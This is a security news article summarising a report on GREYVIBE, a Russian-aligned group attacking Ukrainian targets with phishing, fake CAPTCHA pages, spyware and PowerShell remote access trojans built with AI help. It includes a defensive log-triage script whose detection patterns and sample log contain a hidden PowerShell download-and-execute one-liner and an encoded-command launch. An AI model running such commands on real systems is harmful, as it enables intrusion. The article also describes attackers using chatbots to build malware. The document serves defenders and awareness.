A previously unknown threat actor known as GREYVIBE has been linked to a series of ongoing cyberattacks targeting Ukraine and organizations connected to the country since at least August 2025, according to a new report from cybersecurity firm WithSecure.
Researchers believe GREYVIBE is a Russian-speaking cyber espionage group operating within the Russian time zone. The group’s activities align closely with Kremlin interests, particularly intelligence-gathering operations related to the ongoing Russia-Ukraine conflict.
Multiple Attack Vectors Used to Deliver Malware
According to WithSecure, GREYVIBE has employed a wide range of attack techniques, including spear-phishing emails, fake CAPTCHA verification pages, and fraudulent websites posing as Ukrainian adult clubs. These campaigns have been used to distribute custom-built malware and gain access to targeted systems.
The victim pool includes military personnel, government agencies, civilian organizations, and private-sector businesses, indicating a broad intelligence collection effort.
While the group’s objectives appear state-aligned, researchers also found evidence suggesting links to the Russian cybercriminal ecosystem. Some members are believed to be current or former cybercriminal operators, blurring the line between financially motivated cybercrime and state-sponsored espionage.
AI and Large Language Models Play a Key Role
One of the most notable aspects of GREYVIBE’s operations is its apparent use of generative artificial intelligence (GenAI) and large language models (LLMs).
WithSecure describes the group as a low-to-moderately sophisticated actor that relies heavily on AI-assisted development. Researchers believe AI tools were used to generate malware components, create phishing content, build backend infrastructure, and develop obfuscation techniques.
The use of AI provides several advantages:
- Faster malware development cycles
- Reduced dependence on existing malware frameworks
- Ability to rapidly modify tools and infrastructure
- Improved evasion of traditional attribution methods
However, the reliance on AI has also introduced coding and operational flaws that exposed portions of the group’s infrastructure and malware functionality.
GREYVIBE’s Major Attack Campaigns
Researchers identified several distinct attack chains associated with the threat actor.
PhantomMail
This campaign uses spear-phishing emails containing links to malicious ZIP or RAR archives hosted on cloud storage services. The archives contain JavaScript loaders that launch decoy documents while secretly deploying PhantomRelay, a PowerShell-based remote access trojan (RAT).
PhantomRelay is capable of profiling infected systems, executing PowerShell scripts, and running Windows commands remotely.
PhantomClick
In this campaign, victims are redirected to fake CAPTCHA pages designed to imitate legitimate services such as Zoom and LAPAS. The pages trick users into executing malicious commands, ultimately leading to PhantomRelay infections.
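A defender-side triage of the two delivery chains just described (an archive-borne JavaScript loader that spawns PowerShell, and a fake CAPTCHA page that gets the user to run a command), as an added example that is not from WithSecure's report or the actor's tooling. It assumes a simplified Sysmon-style process-creation log with ParentImage/Image/CommandLine fields and that the CAPTCHA flow ends with PowerShell launched from the desktop shell (explorer.exe as parent); the log lines are constructed.

```python
"""Process-creation triage for the two PhantomRelay delivery chains above.
Added example (not WithSecure's or the actor's code). Input is a constructed,
simplified Sysmon-style log; the field layout and the detail that the fake
CAPTCHA flow ends with PowerShell launched by explorer.exe are assumptions."""
import re
from typing import NamedTuple, Optional

class ProcEvent(NamedTuple):
    parent: str   # parent image, lower-cased basename
    image: str    # process image, lower-cased basename
    cmdline: str  # command line as logged

LINE_RE = re.compile(r"ParentImage=(\S+)\s+Image=(\S+)\s+CommandLine=(.*)")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# A .js loader run from a Temp or archive-extraction folder (WinRAR uses Rar$).
JS_FROM_TEMP = re.compile(r'(?i)\\(temp|rar\$[^\\]*)\\[^"]*\.js\b')
# Hidden window, encoded command, or download-and-execute one-liner.
PS_SUSPICIOUS = re.compile(
    r"(?i)(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}"
    r"|\biex\b|invoke-expression|\biwr\b|invoke-webrequest|downloadstring)")

def parse(line: str) -> Optional[ProcEvent]:
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    base = lambda p: p.lower().rsplit("\\", 1)[-1]
    return ProcEvent(base(m[1]), base(m[2]), m[3])

def classify(ev: ProcEvent) -> Optional[str]:
    """Detection tag for one event, or None if nothing matched."""
    if ev.image in SCRIPT_HOSTS and JS_FROM_TEMP.search(ev.cmdline):
        return "phantommail:js-loader-from-archive"
    if ev.image in POWERSHELL and PS_SUSPICIOUS.search(ev.cmdline):
        if ev.parent in SCRIPT_HOSTS:
            return "phantommail:loader-spawned-powershell"
        if ev.parent == "explorer.exe":
            return "phantomclick:user-launched-powershell"
        return "generic:suspicious-powershell"
    return None

def triage(log_text: str) -> list:
    """(1-based line number, tag) for every line classify() flags."""
    events = (parse(l) for l in log_text.strip().splitlines())
    return [(n, classify(ev)) for n, ev in enumerate(events, 1)
            if ev and classify(ev)]

# Constructed sample: loader from an extracted archive, the PowerShell it
# spawns, a pasted CAPTCHA one-liner, and one legitimate scheduled script.
SAMPLE_LOG = r"""ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\wscript.exe CommandLine="wscript.exe" "C:\Users\u\AppData\Local\Temp\Rar$DIa0.123\Invoice.pdf.js"
ParentImage=C:\Windows\System32\wscript.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell -w hidden -c "iex (iwr http://verify.example.invalid/x)"
ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell.exe -File C:\Scripts\backup.ps1"""
```

Calling triage(SAMPLE_LOG) flags the first three lines with their chain-specific tags and leaves the plain -File launch alone; the parent-process check is what separates a loader-spawned shell from one the user was talked into running.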
PrincessClub
GREYVIBE also operated fake Ukrainian adult-club websites to lure victims.
These sites delivered:
- FallSpy, an Android spyware capable of stealing sensitive mobile data
- PhantomRelayV1, a modified version of PhantomRelay
- LegionRelay, a lightweight PowerShell RAT
Later versions of the websites included WebRTC-based live video and audio call functionality designed to capture victims’ conversations and recordings.
LegionRelay supports:
- File enumeration and exfiltration
- Screenshot capture
- Browser credential theft
- Telegram and WhatsApp data theft
- Remote Desktop Protocol (RDP) access setup
DroneLink
This operation involved fake charitable organizations claiming to support Ukraine’s Armed Forces. Victims were tricked into downloading malicious software, including WireGuard-based payloads and LegionRelay.
Nebo
Researchers also discovered a FallSpy sample disguised as a Russian-language login screen. The malware was likely intended to deceive Ukrainian military personnel into believing they were accessing a legitimate Russian military terminal.
Evidence of Extensive AI-Assisted Development
The diversity of malware families, delivery mechanisms, and infrastructure suggests extensive use of AI platforms.
Researchers identified traces indicating the group may have leveraged tools such as:
- OpenAI ChatGPT
- Google Gemini
- Ideogram AI
These platforms appear to have been used for image generation, malware development, script obfuscation, command creation, and infrastructure management.
Security experts warn that widespread AI adoption by threat actors could make attribution significantly more difficult in the future. As attackers continuously generate and modify code with AI assistance, traditional detection methods that rely on identifying recurring technical artifacts may become less effective.
Connections to the Russian Cybercrime Ecosystem
Several indicators suggest GREYVIBE maintains ties to broader cybercriminal networks.
Researchers highlighted:
- Access to an ISO-building tool linked to the TrickBot ecosystem and UAC-0098
- Reuse of PhantomRelay variants across unrelated cybercrime campaigns
- Uploads of development and testing samples to VirusTotal
- Informal developer naming conventions such as “letsrollboyos,” “totallyunsus,” and “cuteuwu”
- Deployment of XMRig cryptocurrency mining software on some compromised systems
These findings led WithSecure to conclude with moderate confidence that GREYVIBE has connections to the Russian cybercrime landscape and may include former or active cybercriminal operators.
Attribution Remains Unclear
Despite the group’s apparent alignment with Russian strategic interests, researchers caution that its exact relationship with the Russian government remains uncertain.
GREYVIBE may represent:
- A state-sponsored cyber espionage unit
- Independent cybercriminals working under government direction
- A hybrid organization combining criminal and state-affiliated operators
This overlap between cybercrime and nation-state activity creates significant challenges for attribution and highlights the increasingly blurred boundaries within modern cyber operations.
Final Thoughts
GREYVIBE represents a growing trend in cyber warfare where state-aligned actors combine traditional espionage tactics with cybercriminal techniques and AI-assisted development. While the group’s operational security mistakes suggest it lacks the sophistication of elite nation-state actors, its evolving toolkit and diverse attack methods make it a noteworthy threat to Ukrainian organizations and their international partners.
As artificial intelligence becomes more deeply integrated into offensive cyber operations, security teams may face increasing challenges in detecting, tracking, and attributing future threat actors like GREYVIBE.

The use of AI to generate malware by GREYVIBE really highlights how state-level cyber threats are evolving. Combining sophisticated AI with traditional attack methods makes these campaigns more adaptive and harder to detect, raising the stakes for cybersecurity defenders.